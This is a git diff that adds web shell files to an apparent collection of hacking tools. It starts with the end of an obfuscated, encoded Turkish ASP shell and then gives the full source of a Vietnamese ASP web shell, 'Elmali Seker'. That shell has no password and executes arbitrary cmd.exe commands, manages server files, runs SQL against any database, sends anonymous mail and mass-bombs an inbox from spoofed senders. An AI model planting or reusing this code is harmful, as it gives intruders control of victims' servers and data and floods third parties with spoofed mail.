B@*@!(@*H-3bz|z~),@!J4@*@!rUaEOP	C:'v4m/t+v,YzwxEYnXYEP\mV!n'EB~/bynxR*@*@!8D@*P`öMUn3=P_|JHwj}sPz]2'Hr^MW/GWD-jljjz|m;Wt#J*@#@&zl./GVvJ9nðDzjCV!+),@!rxaEDPUlhn{B4lk4&EP-C^E+xvEPOXan{BO6DB@*r#@#@&XmydW^`EPÜMzKH2+=P@!kns+1Y,xC:nxEtC/4*B@*@!G2DkWU~7lsEx8@*]AM|?}@!zK2YbWU@*@!W2ObWx,-l^E+{+@*IAM|f	r]9@!zGwDrW	@*@!GaYkGU,\CV!n{&@*"2V{A&1z]5@!zGwDkGU@*@!WaOkKxP7CsE'W@*]2!mA(Kbg9{U}@!&KwYrG	@*@!WaObWU,\mVE'l@*IAMmH`SP(|?}@!&WaYkKU@*@!J/VnmO@*,[U4k2iLx8dai[U8kwI[	8kwI,P@!kxaED~xm:n'E?C#Ub{nmZKHB,-CV!+{B Rll,5)}G(I,)l cBPOza+xBU;(:rDB@*J#@#@&Mn/aWU/RA.bY+,E@!JYN@*@!&0KDs@*@!zO.@*@!&Ym8V@*E@#@&Xl"dKVcJ@!Om4s@*@!YD@*@!D[@*"WGY,|nz,1lsn@!JYN@*@!ON@*|mDþýsýðý@!&O9@*@!zD.@*@!Y.@*@!YN@*un2e{;i"I3gK|j?AI@!&Y9@*@!Y9@*uF;j@!JON@*@!zD.@*@!DD@*@!ON@*un2e{d6ZzSm\zZC(HA@!&Y9@*@!Y[@*P_|StP@!&Y9@*@!zDD@*@!DD@*@!ON@*C|AemZdbU?3?m]}rP@!JON@*@!O[@*C|/]@!zON@*@!JY.@*@!DD@*@!Y9@*Cn2e{`?3]U@!zD[@*@!YN@*uF2I{`?3Ij~@!zON@*@!zDD@*@!DD@*@!O9@*u|Ae|Zi"IA1K|Z}Hs&M@!zDN@*@!DN@*_F2I{Z`]]2gK|Z61o(VP@!zD[@*@!zO.@*@!zOC(Vn@*rb@#@&zmykWVvJ"3M|?tP @*~jDDk	L`0+Vbhn#,z,I3Mm9qr]f,R@*,ÝxOnT+DcjmXýbPJ~"2!|A&1b"5,R@*,ArxmDz~JPIA!{A(nzH9{U},O@*P\;^YrPUODbxL~JPI3!|HiS:(|?t,O@*Pb+mzPUY.k	oEb@#@&DdwKx/ ADbYPE@!OC(VnPSrNDtxErF!TYrJ~m^Ck/xrJ04DD:rE@*@!Y.P7lsrTx'rEYKwJr@*@!Y9P1Ws/2C	'EJyEJ,lsrTx'EE1+UY.rJ@*r@#@&Yl(VKf!vJ@!4M@*@!8@*I+Tr/D+D,sCD9l	P6|i\zP'PUÝJP(X~jm.?CFcZGH,I*@!&(@*r#@#@&Xm"/KVcJ@!0G.sPl1OkKx'EE'sbVnCY4'rghW9n'W*v~s+Y4G9'2WkO@*@!r	w!YP	lsn'EkULmO+EP\msE'BKV;B,YHwn'v4bN[+	v@*@!4@*\\3r&n+zP=~@!z8@*@!bxw!Y,Uls+xJrtCd4*Jr~YHw+{vO+XYEP-ls;'vB,dk.+x0l@*@!8.@*PcöD	n0)~_|dH-UrwPzI3-tk^.K/W6O-Ul.U)F{;Wt#E#@#@&Hl"WMOlvJ@!r	wEO~7lsExEWV!B,xls+{vtm/4vEPOza+'E.l9kWE~^tm0+[@*~6nj~P ~P@!kU2!YP-C^En'EdbVv,xm:+{B4C/4vvPDX2n{BDm[kKB@*,jÝJPLx(/2i'U(/2iLU4kwI'	4/2I,P@!k	2!Y~	ls+'E?m#?z{F{;W\mEP\msE'Bc l),rnj&?ÝJ~=) RE~YHwnxE?E8hbYv@*rb@#@&./aWxk+cADbYnPr@!&O9@*@!JWWM:@*@!&OD@*@!JYC4sn@*J@#@&KUPD.GMPDnd!:nP	nXY@#@&?YPUljjlnPxPU+.-DR;.+mY+}8%+1YvJ	?^.bwORU4+^VEb@#@&drW,+.D,@!@*PT,Y4+x@#@&i7W^:CNb`EjD\.P9lPqj^DbwDRjCns^PVE^sl	ý:ýUC,ÝykU~7+.:h3ONbDR,ÝþVhP(lþCDýkýy ~Ul.UC|cZWtEb@#@&diDn/2G	/nRUNv#@#@&i+x[~b0@#@&bW,kUN+1Y ,',EXmyEPDtnU@#@&dKUPDDK.~D/!:nPUnXY@#@&ij+^+^O,Zldn,Z(xDc4ld4c*@#@&id;C/Pq@#@&d774l/41P{P?m#jlnR"+L.rD+~`:.ks`4Ckt bS,K.ksc4ld4&*~PrIA!{U}E#@#@&77;l/~ @#@&di74lktOPxPjCj?C|c]+T.rD+PcPMkh`4Ckt+*~,Zq	YvPDb:ctm/4f*#~,EIAM{G	6IGJ*@#@&d7/m/nP2@#@&id74m/t1~{Pjljjm| "+TDbY~`:Dr:vtCd4 #B~Z&xYvP.ks`4ldtfb*~~J"3M|A(HzI5Eb@#@&7d;Ck+~W@#@&dditmdtOPxPUl#jm|R"noqDkDn~`:Db:ctCd4 b~,PDb:c4m/tfbBPEIA!|2phbgf{U}rb@#@&d7Zm/n~l@#@&i7d4l/41~',?m.jlF "+LMrYPcPMk:c4m/4 *S,K.b:vtlkt2b~,J]2V{\idKq|j}r#@#@&73x9PU+s+^O@#@&7k6~+MD~@!@*P!~O4+U@#@&7iWssl9k`rÝþVhP,onDç3snþDkDbs+s+Nb ~.zS`2~NnðnMkUk	~NKðD;~7+P;zTEUPjC^En,obDk9ðk	"k9+UP:rU,WVcE#@#@&dsd+@#@&idGV[;vJ~@!(@*J3tCd4 _E@!J4@*@!(.@*PC9D/k	+,.+TkdYD~zmyýV9ý Pr#@#@&7nx9Pb0@#@&@#@&Vd+,r0,kU%mY+~{PEW0;rPO4+	@#@&ik6~tm/4v,'~EK3Er~Y4+x@#@&7dHl.W.YCcrHn\0rzn+zl,@!4@*ELK.ksc4ld4**[J@!z(@*J*@#@&diWU~DDK.PM+/!hnP	+XY@#@&77M+dwKU/RA.bY+~E@!mnxDnM@*9ð+Mz.mV!n),@!8@*r@#@&7iD+k2W	/+cA.kD+,?C.jCnR]+T]+mN~c:Dkhc4ldtlb*@#@&idM+/aW	d+ch.kD+~E@!z4@*@!z1+xDn.@*r@#@&d7kW~D.@!@*TPDtnU@#@&d77KVhl9rvJFmXýDPIobdYD~VmD[C,4E^;xm:l9ý  Rr#@#@&7dnU9Pr0i7@#@&dnsk+PrW,tC/4,'~r/bVJ,Y4nx@#@&7dHl"GMYlvEH\3b&F+H),@!8@*E':Dr:v4lktXbLJ@!&8@*Jb@#@&7iWU,+MDWMPMn/!:nP	+aO@#@&di4lkt,,x~?m.UlFR]nTfnVO+,`P.b:`4CktX#*@#@&d7b0,+DM@!@*TPDtnx@#@&77iWVsCNb`J"nLkkYDsl.[mx~?bsk	+hn9kR~FAX~XmU^ýþPG^l(kVbDc~XmNCP0lzýO,4E^Cxm:l9ý E#@#@&idnVdn@#@&7diGV9EcE~lþl.ýz^l~?bsbx[bR,J#@#@&i7+	N~k6@#@&7xN,r0,@#@&inUN,k6@#@&@#@&n	N~k6@#@&x[~b0@#@&zmyGDDCm`E@!4@*DbYDnx,4zPA993"P0K.PUl.UCFR;Wt@!&4@*E*@#@&@#@&@#@&A19~U2S3/:@#@&@#@&@#@&kW,wKwEaP{~smVd+,bH9,xW^r/DP',oCVk+,Y4+U@#@&Dn/aGxk+ AMkYn~r@!8D@*@!(D@*r@#@&D+kwKU/RADbYn~r@!Nb-P,/YHsn'rJ.Orx[nX)q*ZIPaWdrDkWUlm4dW^;D+Er@*r@#@&;l^sPnVC/KD6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*@!9k-~,lVrL	'EJMrTtOrJ@*J@#@&ZmsV,fG/Hl6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*J@#@&nU9PkW@#@&@#@&k6~aW2!w,'Pwl^d+,Y4+	@#@&./wKU/RhMrO+,J@!4.@*@!8M@*@!mUYD@*@!Dl4sn,mnV^2mN[bxT'Jr!rEP1+sVkwC^bxo{EJZJJ,ArNDt{JEFTrJ@*J@#@&D/2G	/+ AMkO+,E@!Y.@*@!DNP1Vmd/{JE3(DOhrJP4nkTtY{EE ZJrPdYzs'EJ(Cm0o.G!xNR^KVGD=qyF+8 rJPmVbLx{JEmxOnMJJ@*@!4@*?üDü1üsnD@!z(@*@!zO[@*@!&YM@*J@#@&/C^VPj;ME^E^nM@#@&M+kwW	/ hMkO+,J@!&Dl4^n@*@!zmUO+M@*@!4.@*@!8M@*E@#@&/l^V~j!DE^;&xWW@#@&Hl"KDDllvJ@!8@*qDrYD+U~(XP@!CP4D+6xEJslbVOWlnNNnD@$dl7/CVcmWhEr@*39G3"@!&m@*,sWMP@!CP4Dn0{JE4DYw=&zShhcdC\kl0R^WhErPOlML+D'm8^lxVEr@*	hq Ul#UlnRZKH@!&l@*@!&4@*Jb@#@&Xl.GDDl`r@!8@*:+swslOn,[~Khl,fndboxn[,4zP@!C,t.0{JJslbsYK)WlkY8GH@$/m-/m3R1GhJr@*wbjK$6I@!&l@*@!4M@*j2lmrC^PPtmU0/~DW,slkY(GX@!z8@*r#@#@&xN,r0@#@&g5iqAA==^#~@%>
+<!--EFSO Ejder &  Fastboy tarafýndan yazýlmýþtýr for SaVSaK.CoM . TÜM HAKLARI Ejder e Aitttir.-->
+<!--TÜM HAKLARI SAKLIDIR.. KODLARDA yapacaðýnmýz bir deðiþiklik KODun Çalýþmamasýna mal olur. Bundan dolayý Bir sorun çýkarsa EJDER & SaVSAK.CoM Sorunlu deðildir..-->
+<!--Bu yazýlýmda geliþtilmiþ tüm herþey , mantýk, algoritma, yazýlýmlar Sýfýrdan Ejder tarafýndan yazýlmýþtýr. TEMA , düzen vede Görünüm Fastboy a Aittir. -->
+<!-- TAKLÝTLEÝRNDEN KAÇININ. by EJDER-->
+
+<!--Ejder was HERE-->
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%><p align="right">&nbsp;</p>
+
diff --git a/xakep-shells/ASP/Elmali Seker.asp.txt b/xakep-shells/ASP/Elmali Seker.asp.txt
new file mode 100644
index 0000000..26765f8
--- /dev/null
+++ b/xakep-shells/ASP/Elmali Seker.asp.txt	
@@ -0,0 +1,2324 @@
+<%
+
+' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
+' Email : forever5pi@yahoo.com
+' Website: http://vnhacker.org
+
+option explicit
+
+Server.ScriptTimeout=10000
+Response.Buffer=false
+
+dim gURL,gMsg
+dim targetPath,cp_dst,mv_dst,root
+dim FSO,re
+dim zombie_array,special_array
+
+' ###################################### CONFIGURATION ######################################
+
+const gPassword="" ' mat khau ("" : khong dung password)
+
+const gMax=50 ' chieu dai toi da cho ten file
+const gBomb=1000 ' so luong mail mac dinh can bomb
+
+const lnkExt="lnk,url"
+const editExt="htm,html,asp,asa,txt,inc,css,aspx,js,vbs,shtm,shtml,xml,xsl,log,ini,bat,bak" ' danh sach cac file cho phep edit
+
+const TmpDir="C:\" ' thu muc tam thoi mac dinh
+const Shell="cmd.exe" ' shell mac dinh
+
+' cac chuoi ket noi mac dinh
+const cstrMSSQL = "Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD"
+const cstrJET = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=full_path/db_file.mdb" 
+const cstrACCESS = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=full_path/db_file.mdb"
+const cstrORACLE = "Provider=OraOLEDB.Oracle.1; Data Source=DB_NAME; User ID=UID; Password=PWD"
+const cstrMYSQL = "Driver=MySQL;server=SERVER_IP;uid=UID;pwd=PWD;database=DB_NAME"
+const cstrDSN = "DSN_NAME"
+
+const bSize=false' co/khong hien folder-size
+
+const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" ' tap ki thu dung de sinh chuoi ngau nhien
+
+zombie_array=array("com","net","org","info","vn","cn") ' mang cac domain z0mbie
+special_array=array("yahoo.com","hotmail.com") ' mang cac domain dac biet (dung trong bomb mail)
+
+root=Server.MapPath(".") ' folder mac dinh
+
+' ###########################################################################################
+
+gURL=Request.ServerVariables("SCRIPT_NAME")
+Init()
+if (LCase(Left(Request.ServerVariables("HTTP_CONTENT_TYPE"),19))="multipart/form-data") and (Session("allow")=1) and (Session("mode")=0) then Upload()
+Secure()
+if Request.Form("command")="Logout" then Logout()
+if Request.Form("command")="ChangeMode" then
+Session("mode")=Request.Form("mode")
+Session("switch")=true
+end if
+select case Session("mode")
+case 0 myFile()
+case 1 myCMD()
+case 2 mySQL()
+case 3 myMail()
+end select
+
+'###########################################################################################
+
+sub myFile()
+if Session("switch")=true then
+targetPath=Session("targetPath")
+if targetPath="" then targetPath=root
+Session("switch")=false
+else
+targetPath=Trim(Request.Form("folder"))
+if targetPath="" then targetPath=root else targetPath=abspath(targetPath)
+
+select case Request.Form("command")
+case "Download"
+Download()
+exit sub
+case "Edit"
+Editor()
+exit sub
+case "ChangeAttributesFile","ChangeAttributesFolder"
+ChangeAttributesItem()
+exit sub
+case "Tree"
+Tree()
+exit sub
+case "Delete" Delete()
+case "Move" Move()
+case "Copy" Copy()
+case "ZipInfo" ZipInfo()
+case "NewFile","NewFolder" CreateItem()
+case "RenameFile","RenameFolder" RenameItem()
+case "OpenFolder" OpenFolder()
+case "LevelUp" targetPath=FSO.GetParentFolderName(abspath(Request.Form("folder")))
+case "LevelRoot" targetPath=findroot(abspath(Request.Form("folder")))
+end select
+
+Session("targetPath")=targetPath
+end if
+
+HtmlHeader("")
+HtmlMode()
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub myCMD()
+dim bDoIt
+dim bEcho
+dim szTmpDir,szShell,szCmd,szTmpFile
+dim oScript,oScriptNet,oFile
+
+HtmlHeader("")
+HtmlMode()
+
+set oScript=Server.CreateObject("Wscript.Shell")
+set oScriptNet=Server.CreateObject("Wscript.Network")
+
+szTmpDir=Trim(Request.Form("tmpdir"))
+szShell=Trim(Request.Form("shell"))
+szCmd=Trim(Request.Form("cmd"))
+bEcho=CBool(Request.Form("echo"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoit=false
+szTmpDir=Session("szTmpDir")
+szShell=Session("szShell")
+szCmd=Session("szCmd")
+bEcho=Session("bEcho")
+else
+bDoIt=true
+end if
+
+if szTmpDir="" then szTmpDir=TmpDir else szTmpDir=abspath(szTmpDir)
+if szShell="" then szShell=Shell
+
+Session("szTmpDir")=szTmpDir
+Session("szShell")=szShell
+Session("szCmd")=szCmd
+Session("bEcho")=bEcho
+
+%>
+<form name=frmCMD method=post action="<%=gURL%>">
+<table>
+<tr><td><b>T</b>mpDir:</td><td><input type=text name=tmpdir value="<%=Server.HtmlEncode(szTmpDir)%>" size=20></td></tr>
+<tr><td><b>S</b>hell:</td><td><input type=text name=shell value="<%=Server.HtmlEncode(szShell)%>" size=20></td></tr>
+<tr><td><b>C</b>md:</td><td><input type=text name=cmd value="<%=Server.HtmlEncode(szCmd)%>" size=80> <input type=submit value=Go></td></tr>
+<tr><td><b>E</b>cho:</td><td><input type=checkbox name=echo value=1<%if bEcho then Response.Write " checked"%>></td></tr>
+</table>
+</form>
+<script>frmCMD.cmd.focus()</script>
+<%
+if (szCmd<>"") and (bDoIt=true) then
+if bEcho then
+call oScript.Run(szShell & " /c " & szCmd)
+else
+szTmpFile = addslash(szTmpDir) & FSO.GetTempName
+call oScript.Run(szShell & " /c " & szCmd & " > " & szTmpFile, 0, true)
+if FSO.FileExists(szTmpFile) then set oFile=FSO.OpenTextFile (szTmpFile, 1, false, 0)
+end if
+end if
+%>
+<p><%=FormatDate(Now)%>
+<p><b>I</b>P: <%=Request.ServerVariables("LOCAL_ADDR")%><br>
+<b>U</b>ser: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
+<%
+if (IsObject(oFile)) then
+on error resume next
+%>
+<pre>
+<%=Server.HtmlEncode(oFile.ReadAll)%>
+</pre>
+<%
+oFile.Close
+call FSO.DeleteFile(szTmpFile, true)
+end if
+
+set oScript=nothing
+set oScriptNet=nothing
+
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub mySQL()
+dim szConn,szSQL1,szSQL2,szSQL,bDoIt
+dim intChoice
+
+HtmlHeader("")
+HtmlMode()
+
+szConn=Trim(Request.Form("conn"))
+szSQL1=Trim(Request.Form("sql1"))
+szSQL2=Trim(Request.Form("sql2"))
+intChoice=CInt(Request.Form("choice"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+szConn=Session("szConn")
+szSQL1=Session("szSQL1")
+szSQL2=Session("szSQL2")
+intChoice=Session("intChoice")
+else
+bDoIt=true
+end if
+
+if intChoice=0 then intChoice=1
+if intChoice=1 then szSQL=szSQL1 else szSQL=szSQL2
+
+Session("szConn")=szConn
+Session("szSQL1")=szSQL1
+Session("szSQL2")=szSQL2
+Session("intChoice")=intChoice
+
+select case trim(ucase(szConn))
+case "MSSQL" 
+szConn=cstrMSSQL
+szSQL=""
+case "JET"
+szConn=cstrJET
+szSQL=""
+case "ACCESS"
+szConn=cstrACCESS
+szSQL=""
+case "ORACLE"
+szConn=cstrORACLE
+szSQL=""
+case "MYSQL"
+szConn=cstrMYSQL
+szSQL=""
+case "DSN"
+szConn=cstrDSN
+szSQL=""
+end select
+%>
+<input type=button value="<->" onclick="changeInput()">
+<form name=frmSQL method=post action="<%=gURL%>">
+<input type=hidden name=choice value="<%=intChoice%>">
+<b>C</b>onn: <input type=text name=conn value="<%=Server.HtmlEncode(szConn)%>" size=90> <br>
+<b>S</b>QL:  <span id=s1<%if intChoice=2 then Response.Write " style=""display:none"""%>><input type=text name=sql1 value="<%=Server.HtmlEncode(szSQL1)%>" size=90></span>
+<span id=s2<%if intChoice=1 then Response.Write " style=""display:none"""%>>( [F9] = Go )<br><textarea name=sql2 cols=42 rows=12 onkeydown="if (event.keyCode==120) frmSQL.submit();"><%=Server.HtmlEncode(szSQL2)%></textarea><br></span>
+<input type=submit value=Go>
+</table>
+</form>
+<script>
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+function changeInput() {
+if (s1.style.display=='none') {
+s1.style.display='inline';
+s2.style.display='none';
+frmSQL.choice.value="1";
+frmSQL.sql1.focus();
+} else {
+s1.style.display='none';
+s2.style.display='inline';
+frmSQL.choice.value="2";
+frmSQL.sql2.focus();
+}
+}
+</script>
+<%
+if (szConn<>"") and (szSQL<>"") and (bDoIt=true) then
+dim adoCon, rS
+dim i,intAffected
+
+set adoCon=Server.CreateObject("ADODB.Connection")
+adoCon.Open szConn
+set rS=adoCon.Execute(szSQL, intAffected)
+if (rS.Fields.Count>0) then
+' hien thi ten cua cac truong
+Response.Write "<table border=1>" & vbNewLine & "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt><b>"
+if (rS.Fields(i).Name="") then
+Response.Write "(No column name)"
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Name)
+end if
+Response.Write "</b></tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+' hien thi du lieu tren cac dong
+on error resume next
+rS.MoveFirst
+do while not rS.EOF
+Response.Write "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt>"
+if IsNull(rs.Fields(i).Value) then
+Response.Write "NULL"
+elseif (Trim(rs.Fields(i).Value)="") then
+Response.Write " "
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Value)
+end if
+Response.Write "</tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+rS.MoveNext
+loop
+rS.Close
+Response.Write "</table>" & vbNewLine
+end if
+
+Response.Write "<p><tt>(" & intAffected & " row(s) affected)</tt>"
+
+set rS=nothing
+set adoCon=nothing
+end if
+
+HtmlFooter()
+Destroy()
+end sub
+
+
+'###########################################################################################
+
+sub myMail()
+dim strFrom,strTo,strSubject,strBody,bHtml,intNumber,i,StartTime,EndTime,bDoIt
+dim objMail,objMsg
+
+strTo=Trim(Request.Form("to"))
+
+select case Request.Form("subcommand")
+case "Send"
+strFrom=Trim(Request.Form("from"))
+strSubject=Trim(Request.Form("subject"))
+strBody=Request.Form("body")
+bHtml=CBool(Request.Form("html"))
+case "Bomb"
+if IsNumeric(Request.Form("number")) then intNumber=Int(Request.Form("number"))
+strFrom=Session("strFrom")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+end select
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+strFrom=Session("strFrom")
+strTo=Session("strTo")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+intNumber=Session("intNumber")
+else
+bDoIt=true
+end if
+
+if (intNumber<=0) then intNumber=gBomb
+
+Session("strFrom")=strFrom
+Session("strTo")=strTo
+Session("strSubject")=strSubject
+Session("strBody")=strBody
+Session("bHtml")=bHtml
+Session("intNumber")=intNumber
+
+HtmlHeader("")
+HtmlMode()
+
+if bDoIt then
+select case Request.Form("subcommand")
+case "Send"
+if IsValidEmail(strTo) then
+set objMail=Server.CreateObject("CDONTS.NewMail")
+objMail.To=strTo
+objMail.From=strFrom
+objMail.Subject=strSubject
+objMail.Body=strBody
+if bHtml then
+objMail.BodyFormat=0 'HTML
+objMail.MailFormat=0 'MIME
+end if
+objMail.Send
+set objMail=nothing
+Response.Write "<b>M</b>essage was sent to " & strTo & " successfully." & vbNewLine
+end if
+case "Bomb"
+if IsValidEmail(strTo) then
+Response.Write "<b>B</b>ombing " & Replace(FormatNumber(intNumber,0),",",".") & " mail"
+if intNumber>1 then Response.Write "s"
+Response.Write " to " & strTo & " ... "
+StartTime=Timer
+set objMsg=Server.CreateObject("CDO.Message")
+objMsg.To=strTo
+Randomize
+for i=1 to intNumber
+objMsg.From=makeEmail()
+objMsg.Subject=makeText(Int((50-25+1)*Rnd+25))
+objMsg.TextBody=makeText(Int((100-50+1)*Rnd+50))
+objMsg.Send
+next
+set objMsg=nothing
+EndTime=Timer
+Response.Write howlong(EndTime-StartTime) & vbNewLine
+end if
+end select
+end if
+%>
+<p>
+<table border=1>
+<tr>
+<td width=50%>
+<form name=frmSend method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>a) <b>A</b>nonymous Mail</td>
+</tr>
+<tr>
+<td><b>F</b>rom:</td>
+<td><input type=text name=from value="<%=Server.HtmlEncode(strFrom)%>" size=25></td>
+</tr>
+<tr>
+<td><b>T</b>o:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>S</b>ubject:</td>
+<td><input type=text name=subject value="<%=Server.HtmlEncode(strSubject)%>" size=50></td>
+</tr>
+<tr>
+<td valign=top><b>B</b>ody:</td>
+<td><textarea name=body cols=37 rows=12><%=Server.HtmlEncode(strBody)%></textarea></td>
+</tr>
+<tr>
+<td><b>H</b>tml:</td>
+<td><input type=checkbox name=html value=1<%if bHtml=true then Response.Write " checked"%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Send></td>
+</tr>
+</table>
+</form>
+</td>
+<td width=50% valign=top>
+<form name=frmBomb method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>b) <b>B</b>omb Mail</td>
+</tr>
+<tr>
+<td><b>A</b>ddress:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>N</b>umber:</td>
+<td><input type=text name=number value=<%=intNumber%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Bomb></td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+function IsValidEmail(strEAddress)
+dim objRegExpr
+set objRegExpr = New RegExp
+objRegExpr.Pattern = "^[a-zA-Z0-9][\w\.-]*[a-zA-Z0-9]@[\w-\.]*[a-zA-Z0-9]\.[a-zA-Z]{2,7}$"
+objRegExpr.Global = true
+objRegExpr.IgnoreCase = False
+IsValidEmail = objRegExpr.Test(strEAddress)
+set objRegExpr = nothing
+end function
+
+'###########################################################################################
+
+function makeEmail()
+Randomize
+if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "." & zombie_array(Int((UBound(zombie_array)-0+1)*Rnd+0)) else makeEmail=makeText(8) & "@" & special_array(Int((UBound(special_array)-0+1)*Rnd+0))
+end function
+
+'###########################################################################################
+
+function makeText(intLen)
+dim strNewText,i
+strNewText=""
+Randomize
+for i=1 to intLen
+strNewText=strNewText & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
+next
+makeText=strNewText
+end function
+
+'###########################################################################################
+
+function howlong(intTime)
+if (intTime<60) then
+howlong=intTime & " second(s)"
+elseif (intTime<60*60) then
+howlong=FormatNumber(intTime/60,2) & " minute(s)"
+else
+howlong=FormatNumber(intTime/(60*60),2) & " hour(s)"
+end if
+end function
+
+'###########################################################################################
+
+sub Tree()
+dim path
+path=abspath(Request.Form("param"))
+if FSO.FolderExists(path) then
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<%
+tree_dir(path)
+%>
+</body>
+</html>
+<%
+else
+%>
+<script>alert('Folder not found !');window.close();</script>
+<%
+end if
+Destroy()
+end sub
+
+sub tree_dir(path)
+dim strAttrib,strSize
+
+on error resume next
+
+dim oFolder
+dim oSubFolders,oSubFolder
+dim oFiles,oFile
+dim oSubFolders2,oSubFolder2
+dim oFiles2,oFile2
+
+set oFolder=FSO.GetFolder(path)
+set oSubFolders=oFolder.SubFolders
+set oFiles=oFolder.Files
+
+Response.Write "<p>" & FSO.GetAbsolutePathName(path)
+
+strAttrib=GetAttributes(oFolder.Attributes)
+
+if strAttrib<>" " then Response.Write " (" & GetAttributes(oFolder.Attributes) & ")"
+
+Response.Write vbNewLine
+
+if (oSubFolders.Count>0) or (oFiles.Count>0) then
+%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Type</font></td>
+<td align=center><font color=#FFFF00>Modified</font></td>
+<td align=center><font color=#FFFF00>Attributes</font></td>
+</tr>
+<%
+' liet ke thu muc
+for each oSubFolder in oSubFolders
+%>
+<tr bgcolor=#000000>
+<td><%=oSubFolder.Name%></td>
+<td align=right> </td>
+<td align=center>DIR</td>
+<td align=center><%=FormatDate(oSubFolder.DateLastModified)%></td>
+<td><%=GetAttributes(oSubFolder.Attributes)%></td>
+</tr>
+<%
+next
+
+' liet ke file
+for each oFile in oFiles
+%>
+<tr bgcolor=#000000>
+<td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetExtensionName(path & "\" & oFile.Name)="url") then Response.Write " title=""" & FindLink(path & "\" & oFile.Name) & """"%>><%=oFile.Name%></td>
+<td align=right><%=FormatSize(oFile.Size)%></td>
+<td align=center><%=oFile.Type%></td>
+<td align=center><%=FormatDate(oFile.DateLastModified)%></td>
+<td><%=GetAttributes(oFile.Attributes)%></td>
+</tr>
+<%
+next
+strSize=FormatSize(oFolder.Size)
+%>
+<tr bgcolor=#000000>
+<td colspan=5 align=center><%=oSubFolders.Count%> folder(s), <%=oFiles.Count%> file(s)<%if strSize<>"" then Response.Write " (" & strSize & ")"%></td>
+</tr>
+</table>
+<%
+' goi de qui
+for each oSubFolder in oSubFolders
+set oSubFolder2=oSubFolder.SubFolders
+set oFile2=oSubFolder.Files
+
+if (oSubFolder2.Count>0) or (oFile2.Count>0) then
+tree_dir(oSubFolder.ParentFolder & "\" & oSubFolder.Name)
+end if
+
+set oSubFolder2=nothing
+set oFile2=nothing
+next
+end if
+
+set oSubFolder=nothing
+set oFiles=nothing
+set oFolder=nothing
+end sub
+
+'###########################################################################################
+
+sub Editor()
+dim f,name,path
+
+on error resume next
+
+HtmlHeader("")
+
+name=Request.Form("param")
+path=addslash(targetPath) & name
+
+select case Request.Form("subcommand")
+case "Save","SaveAs"
+set f=FSO.OpenTextFile(path,2,true,-2)
+if Err.Number<>0 then
+gMsg="Can not write to the file """ & name & """, permission denied!"
+Err.Clear
+else
+f.Write Request.Form("content")
+end if
+set f=nothing
+set f=FSO.OpenTextFile(path,1,false,-2)
+case else
+if not FSO.FileExists(path) then
+gMsg="The file """ & name & """ does not exist"
+set f=FSO.CreateTextFile(path,false)
+if Err.Number<>0 then
+gMsg=gMsg & ", also unable to create new file."
+Err.Clear
+else
+gMsg=gMsg & ", created new file."
+end if
+else
+set f=FSO.OpenTextFile(path,1,false,-2)
+if Err.Number<>0 then
+gMsg="Can not read from the file """ & name & """, permission denied!"
+Err.Clear
+end if
+end if
+end select
+%>
+<% if gMsg<>"" then Response.Write "<script>alert('" & gMsg & "')</script>" & vbNewLine %>
+<p><b>E</b>diting - "<%=path%>"<br>
+<form name=frmFile method=post action="<%=gURL%>">
+<b>W</b>rap<input type=checkbox id=wrap onclick="EditorCommand('WordWrap')">
+<center>
+<table width=100%>
+<tr><td align=center>
+<textarea name=content rows=25 cols=46 style="width:580;height:330" wrap=off><%=Server.HTMLEncode(f.ReadAll)%></textarea>
+</td></tr>
+<tr><td align=center>
+<input type=button value=Save onclick="EditorCommand('Save')"> <input type=button value="Save As" onclick="EditorCommand('SaveAs')"> <input type=button value=Reload onclick="EditorCommand('Reload')"> <input type=button value=Close onclick="window.close()">
